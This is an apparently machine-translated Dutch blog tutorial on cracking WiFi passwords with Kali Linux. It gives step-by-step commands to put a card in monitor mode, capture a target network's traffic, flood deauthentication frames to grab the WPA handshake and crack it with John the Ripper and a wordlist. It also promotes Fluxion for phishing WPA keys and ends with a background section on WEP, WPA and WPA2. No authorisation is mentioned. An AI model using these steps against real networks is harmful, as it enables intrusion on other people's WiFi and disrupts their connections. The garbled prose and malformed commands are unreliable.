Hoe Hack Je Wifi Met Kali Linux?

de meest gestelde vraag op Google Is hoe Wifi te hacken met Kali Linux , wifi te hacken, Hoe Wifi te hacken met Kali Linux, enz. Maar eerst begrijpen wat is Wifi & de encryptie.

Post-inhoud

Wat is Wi-Fi en is het mogelijk om het te hacken?

Wi-Fi is de naam van een populaire draadloze netwerktechnologie die radiogolven gebruikt om draadloos breedbandinternet en netwerkverbindingen aan te bieden. Een veel voorkomende misvatting is dat de term Wi-Fi is een afkorting voor “wireless fidelity,” maar dit is niet het geval. Wi-Fi is gewoon een handelsmerk zin die betekent IEEE 802.11 x.

wanneer we praten over wifi hacken van elk apparaat de veiligheid van die wifi is het belangrijkst. Dus wanneer we proberen te hacken wifi is het zeer gemakkelijk te kraken of hack het wachtwoord van WPS beschikbaar systeem. WPS is een van de soorten encryptie, die wordt gebruikt om het WiFi-netwerk te beveiligen, dus laten we beginnen met een snelle tutorial.

Tools gebruikt om wifi wachtwoord te hacken in Kali-Linux

voornamelijk gebruiken we kali Linux ingebouwde toolset om wifi wachtwoord te hacken wat het volgende is:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

dit script kan worden gebruikt om monitormodus op draadloze interfaces in te schakelen. Het kan ook worden gebruikt om terug te gaan van monitor mode naar managed mode. Het invoeren van het airmon-ng commando zonder parameters zal de interfaces status tonen.

gebruik: airmon-ng <start / stop> <interface> of airmon-ng <check / Check kill>

Aireplay-ng

Aireplay-ng wordt gebruikt om frames te injecteren.

de primaire functie is het genereren van verkeer voor later gebruik in aircrack-ng voor het kraken van de WEP-en WPA-PSK-toetsen. Er zijn verschillende aanvallen die deauthentications kunnen veroorzaken voor het vastleggen van WPA handshake data, valse authenticaties, interactieve packet replay, handgemaakte ARP request injectie en ARP-request herjection. Met de packetforge-ng tool is het mogelijk om willekeurige frames te maken.

de meeste toedieners moeten worden aangepast om te kunnen injecteren.

Airodump-ng

Airodump-ng wordt gebruikt voor het vastleggen van pakketten van ruwe 802.11-frames en is bijzonder geschikt voor het verzamelen van WEP IV ‘ s (Initialization Vector) met de bedoeling ze met aircrack-ng te gebruiken. Als u een GPS-ontvanger op de computer hebt aangesloten, kan airodump-ng de coördinaten van de gevonden toegangspunten registreren.

bovendien schrijft airodump-ng verschillende bestanden uit die de details bevatten van alle toegangspunten en clients.

Hccap

om Aircrack-ng capture hashes om te zetten in .hccapx we gebruiken dit commando.

John the Ripper

om het wachtwoord te kraken gebruiken we de john the ripper in de laatste fase. we gebruiken deze tool om de hashes te vergelijken met het wachtwoord woordenboek. Er zijn vele andere manieren, maar we zullen proberen een van hen.

Aircrack-ng

Aircrack-ng is een complete reeks tools om de beveiliging van WiFi-netwerken te beoordelen.

het richt zich op verschillende gebieden van WiFi-beveiliging:

  • toezicht: Packet capture and export of data to text files for further processing by third party tools
  • aanvallen: Replay attacks, deauthentication, fake access points and others via packet injection
  • testen: controleren van WiFi-kaarten en driver mogelijkheden (capture and injection)
  • kraken: WEP en WPA PSK (WPA 1 en 2)

stappen om Wifi te hacken met behulp van Kali-Linux of met een andere Debian Linux OS.

alle opdrachten met beschrijving worden hierboven gegeven controleer of u een probleem heeft.

Stap 1 :

neem eerst uw netwerkkaart in monitormodus om de omliggende netwerken te bewaken.

#airmon-ng start wlan1

1
2

#airodump-ng wlan1mon

3
4

Stap 2:

#airodump-ng –bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon

5
6

Stap 3:

#aireplay-ng -0 0-a 2C:55:D3:B1:35:0C wlan1mon

7

nadat we sucsessfully handshak bestand te vangen zien we iets als dit.

8

Stap 4:

# aircrack-ng kalip300-01.cap-j john

9

Stap 5:

#hccap2john john.hccap > wpa

Stap 6:

# john-wordlist* / root/Desktop / rockyou.txt / root/Desktop / WPA

en we succesvol hack het wifi-wachtwoord Door kali linux

Wifi Hacking Tool :- Fluxion

Fluxion is een instrument voor veiligheidsaudit en sociaal-technisch onderzoek. Het is een remake van linset door vk496 met (hopelijk) minder bugs en meer functionaliteit. Het script probeert de WPA/WPA2 sleutel van een doel toegangspunt op te halen door middel van een social engineering (phishing) aanval. Het is compatibel met de nieuwste release van Kali (rolling). Fluxion ’s aanvallen’ setup is meestal handmatig, maar experimentele auto-mode behandelt een aantal van de aanvallen’ setup parameters. Lees de FAQ voordat u problemen aanvraagt.

draadloze versleuteling

WEP-versleuteling

Wired Equivalent Privacy (WEP) is een IEEE 802.11 draadloos protocol dat beveiligingsalgoritmen biedt voor de vertrouwelijkheid van gegevens tijdens draadloze transmissies.

WEP gebruikt een 24-bit initialisatievector (IV) om stream cipher RC4 te vormen voor vertrouwelijkheid, en de CRC-32 checksum voor intergrity van draadloze transmissie.

hoe WEP werkt

  1. CRC-32 checksum wordt gebruikt om een 32-bit Integrity Check Value (ICV) te berekenen voor de data, die op zijn beurt wordt toegevoegd aan het data frame.

2. Een 24-bits willekeurig getal dat bekend staat als initialisatievector (IV) wordt toegevoegd aan WEP-sleutel; WEP-sleutel en IV worden samen genoemd als WEP-zaad.

3. De WEP seed wordt gebruikt als input voor het RC4 algoritme om een key stream te genereren (key stream is bit-wise XOred met de combinatie van data en ICV om de versleutelde data te produceren).

4. Het IV-veld (IV + PAD + KID) wordt toegevoegd aan de cijfertekst om MAC-Frame

hoe WEP werkt

WPA-encryptie

Wi-Fi Protected Access (WPA) is een data-encryptie methode voor WLAN ‘ s gebaseerd op 802.11 normen.

het is een momentopname van 802.11 i (in ontwikkeling) die een sterkere encryptie biedt en PSK inschakelt voor EAP-authenticatie.

Hoe werkt WPA

Temporal encryption key, transmit address, and TKIP sequence counter (TSC) wordt gebruikt als input voor het RC4-algoritme om keystram te genereren.

MAC Service Data Unit (MSDU) en message intergrity check (MIC) worden gecombineerd met behulp van het Michael-algoritme.

de combinatie van MSDU en MIC is gefragmenteerd om MAC Protocol Data Unit (MPDU) te genereren.

een 32-bit Integrity Check Value (ICV) wordt berekend voor de MPDU

de combinatie van MPDU en ICV wordt bitwise XORed met Keysteam om de versleutelde gegevens te produceren

de IV wordt toegevoegd aan de versleutelde gegevens om MAC-frame te genereren.

WPA 2-versleuteling

WPA 2 biedt een betere Gegevensbescherming voor ondernemingen en WI-FI-gebruikers en netwerktoegangsbeveiliging

biedt beveiliging van overheidskwaliteit door de implementatie van het National Institute of Standards and Technology (NIST) FIPS 140-2-compatibel AES-versleutelingsalgoritme.

WPA2-Personal

WPA2-Personal gebruikt een wachtwoord (vooraf gedeelde sleutel) om ongeautoriseerde netwerktoegang te beschermen.

in PSK-modus versleutelt elk draadloos netwerkapparaat het netwerkverkeer met behulp van een 128-bit sleutel die is afgeleid van een wachtwoordzin van 8 tot 63 ASCII-tekens.

WPA2-Enterprise

het omvat EAP of RADIUS voor gecentraliseerde clientverificatie met behulp van meerdere verificatiemethoden, zoals tokenkaarten, Kerberos, certificaten, enz.

gebruikers krijgen aanmeldingsreferenties toegewezen door een gecentraliseerde server die ze moeten tonen wanneer ze verbinding maken met het netwerk.

hoe WPA2 werkt

in de CCMP-implementatie van WPA2 worden Mac-headergegevens gebruikt om additonal authentication data (AAD) te bouwen.

een gesequenced packet number (PN) wordt gebruikt om nonce te bouwen.

AAD, temporal key en nonce samen met CCMP worden gebruikt voor gegevenscodering.

een WPA2 MAC-Frame wordt gebouwd met behulp van MAC-header, CCMP-header, versleutelde gegevens en versleutelde MIC

Hoe werkt WPA2

mogelijk hebt u gemist hoe de telefoon

te hacken

Write a Comment

Het e-mailadres wordt niet gepubliceerd.